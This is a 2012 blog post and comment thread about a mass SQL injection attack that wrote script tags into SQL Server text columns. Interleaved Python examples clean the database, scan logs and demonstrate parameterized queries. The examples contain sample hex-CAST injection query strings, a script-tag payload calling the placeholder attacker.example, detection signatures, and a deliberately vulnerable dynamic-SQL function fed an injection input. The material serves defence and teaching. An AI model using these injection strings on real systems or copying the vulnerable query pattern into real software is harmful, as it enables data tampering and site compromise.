Wednesday, 1 August 2012

xinthesidersdown.com injection attack in progress

There is currently an injection attack using a script pointing to [donotclick]xinthesidersdown.com/sl.php doing the rounds. The malicious code is hosted on 194.28.115.150, the same IP address as used in this attack yesterday.

10 comments:

  1. We are using Absolute Banner Manager to show banner ads on our website. This xinthesidersdown crap hacked our banner manager last night and destroyed our ads. When I log into the banner manager, my antivirus pops up saying a threat has been detected and shows me this xinthesidersdown.com/sl.php as the attacker. What do I do about this?

  2. This comment has been removed by the author.

  3. A site I manage got hit. Looks like a bot views your home page, tries every link with a querystring, replacing each variable with an obfuscated script.

    The script casts a hex value to a varchar, which becomes a script that is executed.

    The script cursors over information_schema, gets all tables and columns of varchar, nvarchar, text and ntext, of size > 30.

    It then loops, and updates each table/column it finds with your existing text, prepended with a close title tag, the script tag, then an html comment block.

  4. Check your databases/tables. It possibly has replaced all the text/varchar fields contents with the html you are seeing.

    We had to restore our DBs, then put a fix in to stop this type of hack.

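
Comments 3 and 4 describe the mechanism: every varchar/nvarchar/text/ntext column gets the injected fragment (close-title tag, script tag, HTML comment) written into its existing values, and recovery means checking every such column. The script below is an added example, not code from the post or from any commenter: it uses Python with an in-memory sqlite database standing in for SQL Server (sqlite's `PRAGMA table_info` plays the role of `information_schema.columns`), builds constructed sample tables, then sweeps every character-typed column for the fragment and strips it. The host `attacker.example`, the table names and the row contents are all constructed placeholders.

```python
import re
import sqlite3

# The fragment comment 3 describes: close-title tag, script tag, HTML comment.
# The src host is a constructed placeholder, not the real domain from the post.
INJECTED_FRAGMENT = '</title><script src="http://attacker.example/sl.php"></script><!--'
MARKER_RE = re.compile(r'</title><script[^>]*></script><!--', re.IGNORECASE)

# Column types the injection targeted, per comment 3 (char/nchar added for completeness).
TEXT_TYPES = ("varchar", "nvarchar", "text", "ntext", "char", "nchar")


def build_sample_db():
    """Constructed sample database; sqlite stands in for SQL Server here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), price REAL)")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title NVARCHAR(200), body TEXT)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)",
                     [("Widget" + INJECTED_FRAGMENT, 9.99), ("Gadget", 19.99)])
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)",
                     [("Hello" + INJECTED_FRAGMENT, "Body text" + INJECTED_FRAGMENT),
                      ("Clean", "Nothing here")])
    conn.commit()
    return conn


def text_columns(conn):
    """Yield (table, column) for every character-typed column in the schema.

    On SQL Server the same list comes from information_schema.columns filtered
    on data_type; sqlite's PRAGMA table_info is the stand-in used here.
    """
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        for _, col, coltype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if coltype.lower().split("(")[0] in TEXT_TYPES:
                yield table, col


def find_infected(conn):
    """Return {(table, column): affected_row_count} for columns carrying the marker.

    Table and column names come from the schema catalogue, not from user input,
    so quoting them as identifiers is safe here.
    """
    hits = {}
    for table, col in text_columns(conn):
        n = conn.execute(f'SELECT COUNT(*) FROM "{table}" WHERE "{col}" LIKE ?',
                         ("%</title><script%",)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits


def clean_infected(conn):
    """Strip the injected fragment from every affected value; return rows changed."""
    changed = 0
    for table, col in find_infected(conn):
        rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                            ("%</title><script%",)).fetchall()
        for rowid, value in rows:
            cleaned = MARKER_RE.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                             (cleaned, rowid))
                changed += 1
    conn.commit()
    return changed


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", find_infected(db))
    print("rows cleaned:", clean_infected(db))
    print("after:", find_infected(db))
```

Run the sweep against a restored backup first, as comment 4 did, and treat a non-empty `find_infected` result on the live database as the trigger for restoring rather than patching values in place: the cleanup shown here only removes the fragment it knows about.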
  5. What kind of fix can you install to stop this attack?

  6. Stevey,

    How is the attack done, and what kind of fix have you done?

  7. There is a decent explanation of the attack here: http://stackoverflow.com/questions/11751636/searching-logs-for-sql-injection

    The attacker uses the CAST function to add malicious SQL code to the end of a query string, which gets executed by SQL Server. Some suggest searching for the term "CAST" in your website logs, but so far, I have not been able to find that term, or any record of any compromised query strings. Are there any other suggestions out there as to how to find the page, or the query string that the hacker is using to inject the malicious code?

    Thanks!

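
Comment 7 reports that a plain search of the logs for "CAST" turned up nothing. One reason a literal search can miss the request is that the query string arrives URL-encoded, sometimes doubly so; that is an assumption added here, not something the thread establishes. The scanner below is an added example, not code from the post or from any commenter. It parses a constructed IIS-style W3C log excerpt, URL-decodes each query string until it stops changing, matches the hex-cast pattern comment 7 describes on the decoded text, and decodes any `0x...` literal so the analyst can read it. The hex literal in the sample decodes to the harmless text `SELECT 1`, the client addresses are documentation ranges, and the page names are invented.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style W3C log excerpt, reduced to a few fields. The last line is
# an ordinary search for "cast iron pan" that a naive grep for CAST would flag.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-08-01 03:14:07 10.0.0.5 GET /products.asp id=12 203.0.113.9 200
2012-08-01 03:14:09 10.0.0.5 GET /products.asp id=12;DECLARE%20@s%20VARCHAR(4000);SET%20@s=CAST(0x53454C4543542031%20AS%20VARCHAR(4000));EXEC(@s);-- 198.51.100.23 200
2012-08-01 03:14:11 10.0.0.5 GET /news.asp cat=5%2527%253bdeclare%2520%2540q%2520varchar(100)%253bset%2520%2540q%253dcast(0x53454C4543542031%2520as%2520varchar(100))%253bexec(%2540q)-- 198.51.100.23 500
2012-08-01 03:15:00 10.0.0.5 GET /search.asp q=cast%20iron%20pan 192.0.2.44 200
"""

# Signatures for the hex-to-varchar CAST pattern the thread describes. They run
# on the fully decoded query, so encoded and double-encoded variants match too.
SIGNATURES = {
    "hex-cast": re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar", re.I),
    "declare-var": re.compile(r"declare\s+@\w+", re.I),
    "exec-var": re.compile(r"exec\s*\(\s*@\w+\s*\)", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)


def fully_decode(value, max_rounds=3):
    """URL-decode until the text stops changing (bounded), so %2520 -> %20 -> space."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_hex_literals(text):
    """Render each 0x... literal as text so an analyst can read what it carried."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        try:
            out.append(bytes.fromhex(m.group(1)).decode("latin-1"))
        except ValueError:  # odd-length literal, not decodable as bytes
            out.append("<unparseable hex>")
    return out


def parse_w3c(log_text):
    """Yield one dict per request, keyed by the names in the #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))


def scan_log(log_text):
    """Return a finding per suspicious request: client, page, rules hit, decoded hex."""
    findings = []
    for rec in parse_w3c(log_text):
        query = fully_decode(rec.get("cs-uri-query", ""))
        hit = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hit:
            findings.append({
                "c-ip": rec["c-ip"],
                "cs-uri-stem": rec["cs-uri-stem"],
                "rules": hit,
                "decoded_hex": decode_hex_literals(query),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The `cs-uri-stem` values in the findings answer the question in comment 7 directly: they are the pages whose query-string parameters were reached, and the `c-ip` column groups the requests by source. Match on the decoded query rather than the raw log line, and require the `0x` literal next to `CAST(... AS VARCHAR` rather than the bare word, or ordinary searches like the last sample line become false positives.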
  8. This comment has been removed by the author.

  9. A website I manage got hit on August 1st too. We use ASP, ASP.NET and SQL Server, as do most of the people I found to have been attacked by this malware network.

    Actually, we detected a minor attack the week before, coming from a USA IP (98.88.189.164). They got into the FTP and slipped in some files (including c99.txt). This allows RFI (Remote File Inclusion), and I don't really know if this was only a step towards the August 1st attack, or just a coincidence. They messed up the FTP doing random stuff (such as deleting some files) and tried to look for log files. I got really annoyed reading the 30k-line log...

    On July 31st we were attacked by the "lasimp04risoned.rr.nu" malware. It affected FTP files and the database. The next day, the database changed from "lasimp04risoned.rr.nu" to the "xinthesidersdown" one.

    We've restored the whole FTP and database, generated new strong passwords, and blocked ".rr.nu" address.

    Take good care of those querystrings...

  10. Tom, the only way to prevent attacks like this is to properly code the .NET application to use parameterized queries instead of fully dynamic SQL when creating the queries which are sent to the SQL Server.

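
Comment 10 gives the fix: parameterized queries instead of SQL text assembled from the query string. The snippet below is an added example, not the commenter's code or the application's; it uses Python with an in-memory sqlite database as a stand-in for SQL Server and a constructed `products` table with an invented `sku` column. The two lookup functions differ only in how the value reaches the database, which is enough to show why the dynamic version leaks rows the filter was meant to hide while the parameterized one treats the same input as a string to compare against.

```python
import sqlite3


def build_sample_db():
    """Constructed sample data; sqlite stands in for SQL Server here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, sku VARCHAR(20),"
                 " name VARCHAR(100), public INTEGER)")
    conn.executemany("INSERT INTO products (sku, name, public) VALUES (?, ?, ?)",
                     [("W-1", "Widget", 1), ("G-2", "Gadget", 1), ("U-3", "Unreleased", 0)])
    conn.commit()
    return conn


def lookup_dynamic(conn, sku):
    """The vulnerable pattern: the querystring value is pasted into the SQL text,
    so anything it contains becomes part of the statement the server runs."""
    sql = ("SELECT name FROM products WHERE public = 1 AND sku = '"
           + sku + "' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, sku):
    """The fix comment 10 describes: the value is bound as a parameter, so the
    statement's shape is fixed and the input can only ever be compared as data."""
    rows = conn.execute(
        "SELECT name FROM products WHERE public = 1 AND sku = ? ORDER BY id", (sku,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_sample_db()
    for value in ("W-1", "W-1' OR public = 0 --"):
        print(repr(value), "dynamic:", lookup_dynamic(db, value),
              "parameterized:", lookup_parameterized(db, value))
```

The same shape in ADO.NET is a `SqlCommand` whose text contains `@sku` and whose `Parameters` collection carries the value; the point is the same in either stack: the server receives the statement and the value separately, so the `public = 1` condition cannot be rewritten by what arrives in the query string.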